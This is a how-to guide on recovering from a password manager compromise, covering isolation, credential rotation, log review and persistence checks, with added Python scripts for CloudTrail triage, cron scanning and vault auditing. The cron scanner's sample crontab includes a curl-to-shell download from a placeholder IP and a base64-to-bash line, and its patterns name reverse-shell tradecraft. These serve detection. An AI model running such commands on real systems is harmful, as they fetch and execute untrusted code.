Privacy Tools Guide

Immediately disconnect the compromised device from the network, revoke active sessions from your password manager's web dashboard, and change your master password from a different, trusted device. Assume every stored credential is exposed and start rotating the most critical ones (email, banking, admin accounts) right away. For developers: regenerate all API keys, SSH keys, and database credentials stored in the vault, audit access logs on the affected services, and deploy the new credentials to production before revoking the old ones. Report the incident to your password manager provider and determine whether the breach was local (malware on your device) or service-wide, then migrate to a new password manager with a new master password once the threat is contained.

Immediate Actions (First 15 Minutes)

The first minutes after discovering a compromise are critical. Your priority is limiting damage and securing remaining accounts.

1. Disconnect Compromised Devices

If you suspect malware or keylogger involvement, immediately disconnect affected devices from the network:

# macOS - bring the active interface down (en0 is usually Wi-Fi on a laptop)
sudo ifconfig en0 down

# Linux with NetworkManager (interface names look like eth0, wlan0 or enp0s3)
nmcli device disconnect eth0

# Linux without NetworkManager
sudo ip link set eth0 down

Do not power the machine off if you intend to do forensic work: shutting down destroys volatile evidence such as running processes, open network connections and anything a keylogger is holding in memory. Disconnect it, capture a memory image if you have the tooling, and only then examine the disk from a live USB or from another known-clean system.

2. Revoke Active Sessions

Most password managers support session management. Revoke all active sessions immediately:

# Bitwarden CLI - this only clears the session on the machine you run it on
bw logout
# Server-side revocation is done in the web vault: Settings > My account >
# Deauthorize sessions. That logs out every device and forces a fresh login.
# Log in again only from a known-clean device.

For 1Password, deauthorize the affected devices from your account profile on 1Password.com; a deauthorized device has to re-enter the Secret Key before it can unlock the vault again.

3. Change Your Master Password

If you still have access to your account and suspect the master password may be compromised, change it immediately from a trusted device. Use a passphrase of at least 20 characters that you can actually remember; a generated word-based passphrase is a better master password than raw random bytes. In Bitwarden, tick the option to rotate the account encryption key when you change the master password so that the stored vault data is re-encrypted as well:

# Generate a memorable passphrase with the manager itself
bw generate --passphrase --words 6 --separator -

# Random strings are fine for vault entries, but hard to memorise as a master password
openssl rand -base64 24 # 24 random bytes encode to a 32-character string

Account-Specific Recovery Steps

After securing your password manager, systematically work through your stored credentials.

Prioritize High-Value Accounts

Start with accounts that grant access to sensitive systems:

  1. Cloud provider consoles (AWS, GCP, Azure)
  2. GitHub/GitLab repositories
  3. CI/CD pipelines
  4. Email accounts (especially primary email)
  5. Password managers (if nested)
  6. Financial accounts

Use Temporary Credentials Where Possible

For service accounts and API keys that cannot be rotated in every consumer at once, deactivate the exposed key first and work from short-lived credentials minted by a trusted identity. Do not mint STS session tokens from the compromised long-term key itself: whoever holds that key can mint them too.

# AWS - disable the exposed key, then work from temporary STS credentials
aws iam update-access-key --user-name deploy --access-key-id "$EXPOSED_KEY_ID" --status Inactive
# From a trusted, MFA-backed identity (12 hours max for IAM users)
aws sts get-session-token --duration-seconds 43200

# GitHub - personal access tokens cannot be created through the REST API.
# Revoke the exposed token under Settings > Developer settings > Personal access tokens,
# create a replacement with an expiry date, and re-authenticate the CLI:
gh auth refresh

Review Access Logs

Check for unauthorized access during the compromise window. The GitHub events API only returns public activity; the authoritative record for a user account is the security log at https://github.com/settings/security-log, and for an organization the audit log, which `gh api` can query:

# GitHub - confirm which account the CLI is using, then review recent pushes
gh auth status
gh api /users/USERNAME/events | jq '.[] | select(.type == "PushEvent") | {repo: .repo.name, created_at}'
# Organization audit log (organization owners, GitHub Enterprise Cloud)
gh api /orgs/ORG/audit-log --paginate

# AWS - CloudTrail: IAM calls inside the suspected compromise window (example dates)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventSource,AttributeValue=iam.amazonaws.com \
  --start-time 2024-05-01T00:00:00Z --end-time 2024-05-02T00:00:00Z
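Reading raw CloudTrail output by eye is error-prone, so here is an added example of the triage a responder actually does over it. This is example code written for this guide, not from the original page or from AWS: it consumes the JSON shape that `aws cloudtrail lookup-events` prints (an `Events` list where each entry carries the full record as a JSON string in `CloudTrailEvent`), keeps only calls inside the suspected compromise window, and flags those that mutate IAM or CloudTrail itself or that come from a source IP you do not recognise. The event list is constructed for illustration; real records carry many more fields.

```python
"""Triage `aws cloudtrail lookup-events` output for post-compromise IAM activity.

Added example for this guide, not code from the original page or from AWS.
The sample events below are constructed.
"""
import json
from datetime import datetime, timezone

# API calls an attacker with stolen keys uses to persist, escalate or hide.
PERSISTENCE_CALLS = {
    "CreateAccessKey", "CreateUser", "CreateLoginProfile", "UpdateLoginProfile",
    "AttachUserPolicy", "AttachRolePolicy", "PutUserPolicy", "PutRolePolicy",
    "CreateRole", "UpdateAssumeRolePolicy", "DeactivateMFADevice",
    "StopLogging", "DeleteTrail", "PutEventSelectors",
}


def cloudtrail_event(name, time, user, ip, agent, **params):
    """Build one event in lookup-events shape (helper for the constructed sample)."""
    record = {"eventName": name, "sourceIPAddress": ip, "userAgent": agent,
              "requestParameters": params}
    return {"EventName": name, "EventTime": time, "Username": user,
            "CloudTrailEvent": json.dumps(record)}


SAMPLE_LOOKUP_OUTPUT = {"Events": [  # constructed sample
    cloudtrail_event("ListUsers", "2024-05-01T09:12:00Z", "alice",
                     "203.0.113.10", "aws-cli/2.15.0"),
    cloudtrail_event("CreateAccessKey", "2024-05-01T10:03:41Z", "alice",
                     "198.51.100.77", "aws-cli/1.29.0", userName="alice"),
    cloudtrail_event("AttachUserPolicy", "2024-05-01T10:04:02Z", "alice",
                     "198.51.100.77", "aws-cli/1.29.0",
                     policyArn="arn:aws:iam::aws:policy/AdministratorAccess"),
    cloudtrail_event("GetCallerIdentity", "2024-05-01T10:05:00Z", "alice",
                     "198.51.100.77", "aws-cli/1.29.0"),
    cloudtrail_event("CreateUser", "2024-04-20T08:00:00Z", "alice",
                     "203.0.113.10", "console.amazonaws.com", userName="ci-bot"),
]}


def parse_time(value):
    """Accept ISO 8601 with or without a trailing Z; treat naive values as UTC."""
    when = datetime.fromisoformat(str(value).replace("Z", "+00:00"))
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    return when.astimezone(timezone.utc)


def triage(lookup_output, window_start, window_end, known_ips):
    """Return flagged events inside [window_start, window_end], oldest first."""
    start, end = parse_time(window_start), parse_time(window_end)
    findings = []
    for ev in lookup_output.get("Events", []):
        when = parse_time(ev["EventTime"])
        if not start <= when <= end:
            continue
        detail = json.loads(ev.get("CloudTrailEvent", "{}"))
        ip = detail.get("sourceIPAddress", "")
        reasons = []
        if ev["EventName"] in PERSISTENCE_CALLS:
            reasons.append("iam-mutation")
        if ip and ip not in known_ips:
            reasons.append("unknown-ip")
        if reasons:
            findings.append({"time": when.isoformat(), "event": ev["EventName"],
                             "user": ev.get("Username"), "ip": ip,
                             "user_agent": detail.get("userAgent"),
                             "params": detail.get("requestParameters", {}),
                             "reasons": reasons})
    findings.sort(key=lambda f: f["time"])
    return findings


def attacker_ips(findings):
    """Source IPs behind the IAM mutations; pivot on these across all services."""
    return sorted({f["ip"] for f in findings if "iam-mutation" in f["reasons"]})


if __name__ == "__main__":
    hits = triage(SAMPLE_LOOKUP_OUTPUT, "2024-05-01T09:00:00Z",
                  "2024-05-01T12:00:00Z", {"203.0.113.10"})
    for h in hits:
        print(h["time"], h["event"], h["ip"], ", ".join(h["reasons"]))
    print("pivot on:", attacker_ips(hits))
```

Pipe the CLI output in with `aws cloudtrail lookup-events ... | python3 triage.py` after swapping the constructed sample for `json.load(sys.stdin)`; the set of known IPs should come from your office, VPN and CI egress addresses. Note that `lookup-events` only covers the last 90 days and the region you query, so run it per region or query the trail's S3 bucket with Athena for anything older.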

Forensic Analysis

Understanding how the compromise occurred helps prevent future incidents.

Identify the Attack Vector

Common attack vectors for password manager compromises:

  1. Infostealer or keylogger malware on a device where the vault is unlocked
  2. A malicious or hijacked browser extension reading the unlocked vault or its autofill
  3. A breach on the provider's side, exposing encrypted vault data to offline cracking of weak master passwords

Check for Indicators of Compromise

Run these checks on affected systems:

# macOS - login items (macOS 13+) and launch agents/daemons
sfltool dumpbtm
ls -la ~/Library/LaunchAgents /Library/LaunchAgents /Library/LaunchDaemons

# Linux - cron jobs and systemd timers used for persistence
crontab -l
cat /etc/crontab
ls -la /etc/cron.d /etc/cron.hourly /etc/cron.daily
systemctl list-timers --all

# Windows - scheduled tasks
schtasks /query /fo LIST /v
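The cron output above is easy to skim past, so here is an added example of turning the check into detection logic. This is example code written for this guide, not from the original page: it parses crontab lines (user crontabs and, with `system_crontab=True`, the `/etc/crontab` format that carries a user field) and flags entries showing common persistence tradecraft: downloading and piping into a shell, decoding base64 at run time, running from world-writable or hidden directories, netcat with `-e`, inline interpreter one-liners, and `@reboot` triggers. The sample crontab is constructed; the indicator list is a starting point, not a complete signature set.

```python
"""Flag persistence tradecraft in cron entries.

Added example for this guide, not code from the original page.
The crontab below is constructed for illustration.
"""
import re

# (pattern, reason) pairs matched against the command part of each entry.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "downloads and pipes into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes base64 at run time"),
    (re.compile(r"(^|[\s'\"])/(tmp|var/tmp|dev/shm)/"), "runs from a world-writable directory"),
    (re.compile(r"/\.[A-Za-z0-9_-]+/"), "runs from a hidden directory"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"), "netcat with -e (reverse shell)"),
    (re.compile(r"\b(python[23]?|perl|ruby)\s+-[ce]\b"), "inline interpreter one-liner"),
    (re.compile(r"\bchattr\s+\+i\b"), "makes a file immutable"),
]

SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /home/dev/.config/.x/update.sh
@reboot /bin/sh -c 'curl -s http://198.51.100.23/a.sh | sh'
30 3 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
* * * * * echo ZWNobyBoaQo= | base64 -d | bash
"""


def parse_cron_line(line, system_crontab=False):
    """Split one crontab line into (schedule, user, command).

    Returns None for blank lines, comments, environment assignments and
    entries with no command. `user` is None unless system_crontab is set.
    """
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
        return None
    n_sched = 1 if line.startswith("@") else 5      # @reboot vs five time fields
    n_fields = n_sched + (1 if system_crontab else 0)
    parts = line.split(None, n_fields)
    if len(parts) <= n_fields:
        return None
    schedule = " ".join(parts[:n_sched])
    user = parts[n_sched] if system_crontab else None
    return schedule, user, parts[n_fields]


def scan(text, system_crontab=False):
    """Return a finding per suspicious entry: line number, schedule, user, command, reasons."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = parse_cron_line(raw, system_crontab)
        if parsed is None:
            continue
        schedule, user, command = parsed
        reasons = [why for rx, why in INDICATORS if rx.search(command)]
        if schedule == "@reboot":
            reasons.append("runs at every boot")
        if reasons:
            findings.append({"line": lineno, "schedule": schedule, "user": user,
                             "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run it over the real output with `crontab -l | python3 cronscan.py` after replacing the sample, and over `/etc/crontab` and each file in `/etc/cron.d` with `system_crontab=True`. Anything it flags still needs a human look: a hidden dotfile directory is normal for some tooling, but a `curl | sh` at `@reboot` is not.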

Review Recent Installations

Examine recently installed software, browser extensions, and system modifications:

# macOS - applications by modification time, newest first
ls -lat /Applications | head -20

# Linux - apt's history log records the command line; dpkg.log records each install
grep "Commandline" /var/log/apt/history.log | tail -20
grep " install " /var/log/dpkg.log | tail -20

# Chromium-based browsers on Linux - extension IDs present on disk
ls -la ~/.config/google-chrome/Default/Extensions/

Rebuilding Your Security Posture

After securing accounts, implement stronger security measures.

Enable Multi-Factor Authentication

Ensure all critical accounts use hardware security keys or authenticator apps; this is configured in each service's web settings (GitHub: Settings > Password and authentication). SSH keys are not a second factor, but moving git access to a fresh ed25519 key retires any key that was stored in the vault:

# Generate a new SSH key for GitHub (the old one, if it lived in the vault, is burned)
ssh-keygen -t ed25519 -C "your_email@example.com"
# Add the public key to GitHub via the web interface or the CLI:
gh ssh-key add ~/.ssh/id_ed25519.pub --title "laptop-rebuilt"
# Then delete the old key under Settings > SSH and GPG keys

Implement Secret Rotation Policies

Set up automated rotation for critical secrets:

# Example: rotate a database credential stored in Bitwarden
# Generate the new secret, change it on the database first, then update the vault item
NEW_PASSWORD=$(openssl rand -base64 32)
# ... apply NEW_PASSWORD on the database side (e.g. ALTER USER) before continuing ...
ITEM_ID=$(bw get item "database-production" | jq -r '.id')
bw get item "$ITEM_ID" \
  | jq --arg pw "$NEW_PASSWORD" '.login.password = $pw' \
  | bw encode \
  | bw edit item "$ITEM_ID"
bw sync

Consider Architecture Changes

Evaluate whether your current password manager meets your security requirements, in particular whether the vault is encrypted client-side with a key derived from the master password, and whether the provider supports hardware-key MFA and session revocation.

Prevention Strategies

Implement these practices to reduce future risk:

Regular Security Audits

Quarterly review of your credential inventory:

# Bitwarden - export and audit your vault. The export is plaintext: keep it off
# shared or synced disks and delete it as soon as you are done.
bw export --format json --output vault-export.json
# Count login items (type 1) whose password is shorter than 16 characters
jq '[.items[] | select(.type == 1) | select((.login.password // "") | length < 16)] | length' vault-export.json
# Remove the plaintext export (macOS has no shred; use rm -P there)
shred -u vault-export.json
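The jq one-liner gives a count; during a response you want an ordered rotation list. The following is an added example written for this guide (not code from the original page or from Bitwarden) that serves both the "Prioritize High-Value Accounts" list earlier and this audit: it reads the structure `bw export --format json` produces (an `items` array where login items have `type` 1 and a `login` object with `username`, `password` and `uris`), ranks each login by the tier of account it unlocks using the priority order given above, and flags passwords that are short or shared between items. The tier domain lists and the export itself are constructed for illustration; extend the domain lists with your own providers.

```python
"""Prioritise and audit a Bitwarden-style JSON vault export.

Added example for this guide, not code from the original page or from
Bitwarden. The export below is constructed; a real one is plaintext, so
keep it off disk or shred it afterwards.
"""
from collections import defaultdict
from urllib.parse import urlparse

# Rank 1 is rotated first. Domains match as the exact host or a parent domain.
TIERS = [
    (1, "cloud console", ("aws.amazon.com", "amazonaws.com", "cloud.google.com", "portal.azure.com")),
    (2, "source control / CI", ("github.com", "gitlab.com", "circleci.com")),
    (3, "email", ("mail.google.com", "outlook.office.com", "fastmail.com")),
    (4, "password manager", ("bitwarden.com", "1password.com")),
    (5, "financial", ("chase.com", "paypal.com", "wise.com")),
]
OTHER = (9, "other")
MIN_LENGTH = 16  # same threshold as the jq one-liner

SAMPLE_EXPORT = {  # constructed; real exports carry many more fields per item
    "encrypted": False,
    "items": [
        {"type": 1, "name": "AWS root", "login": {"username": "ops@example.com",
         "password": "Tr0ub4dor&3", "uris": [{"uri": "https://console.aws.amazon.com/"}]}},
        {"type": 1, "name": "GitHub", "login": {"username": "dev",
         "password": "correct-horse-battery-staple-2024!", "uris": [{"uri": "https://github.com/login"}]}},
        {"type": 1, "name": "Gmail", "login": {"username": "ops@example.com",
         "password": "Tr0ub4dor&3", "uris": [{"uri": "https://mail.google.com/"}]}},
        {"type": 1, "name": "Bank", "login": {"username": "ops",
         "password": "xK9#mP2$vL5@nQ8w", "uris": [{"uri": "https://www.chase.com/"}]}},
        {"type": 1, "name": "Forum", "login": {"username": "ops",
         "password": "hunter2", "uris": [{"uri": "https://forum.example.net/"}]}},
        {"type": 2, "name": "Recovery codes", "notes": "..."},  # secure note: nothing to audit
    ],
}


def host_of(uri):
    """Lowercase hostname of a URI; bare hostnames are accepted too."""
    if "://" not in uri:
        uri = "https://" + uri
    return (urlparse(uri).hostname or "").lower()


def tier_for(uris):
    """Highest-priority tier matching any of the item's URIs, else OTHER."""
    hosts = [host_of(u.get("uri") or "") for u in (uris or [])]
    for rank, label, domains in TIERS:
        if any(h == d or h.endswith("." + d) for h in hosts for d in domains):
            return rank, label
    return OTHER


def audit(export):
    """Login items ordered for rotation, each with weak/reused flags."""
    logins = [it for it in export.get("items", []) if it.get("type") == 1 and it.get("login")]
    users_of = defaultdict(list)            # password -> item names using it
    for it in logins:
        pw = it["login"].get("password") or ""
        if pw:
            users_of[pw].append(it["name"])
    findings = []
    for it in logins:
        pw = it["login"].get("password") or ""
        rank, label = tier_for(it["login"].get("uris"))
        flags = []
        if len(pw) < MIN_LENGTH:
            flags.append("weak")
        if len(users_of[pw]) > 1:
            flags.append("reused")
        findings.append({"name": it["name"], "tier": rank, "category": label, "flags": flags,
                         "shared_with": [n for n in users_of[pw] if n != it["name"]]})
    findings.sort(key=lambda f: (f["tier"], -len(f["flags"]), f["name"]))
    return findings


def rotation_order(export):
    """Item names in the order they should be rotated."""
    return [f["name"] for f in audit(export)]


if __name__ == "__main__":
    for f in audit(SAMPLE_EXPORT):
        print(f"tier {f['tier']} {f['category']:<20} {f['name']:<14} {' '.join(f['flags']) or 'ok'}")
```

Feed it the real file with `json.load(open("vault-export.json"))` in place of the sample, and treat every "reused" hit as two rotations, because an attacker who recovers one of the pair gets the other for free.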

Device Security Hardening

Secure the devices you use to access your password manager: full-disk encryption, automatic OS and browser updates, no unvetted browser extensions, and a screen lock that re-locks the vault.

Network Security

Isolate your password manager access:

# Use a VPN when accessing password managers on public networks.
# Default-deny outbound and allow only what the manager needs: DNS and HTTPS.
# Test on a non-production machine first; this blocks every other outbound
# port (SSH, SMTP, NTP, package mirrors on plain HTTP).
sudo ufw default deny outgoing
sudo ufw allow out 53        # DNS, otherwise nothing resolves
sudo ufw allow out 443/tcp   # HTTPS only
sudo ufw enable

Built by theluckystrike — More at zovo.one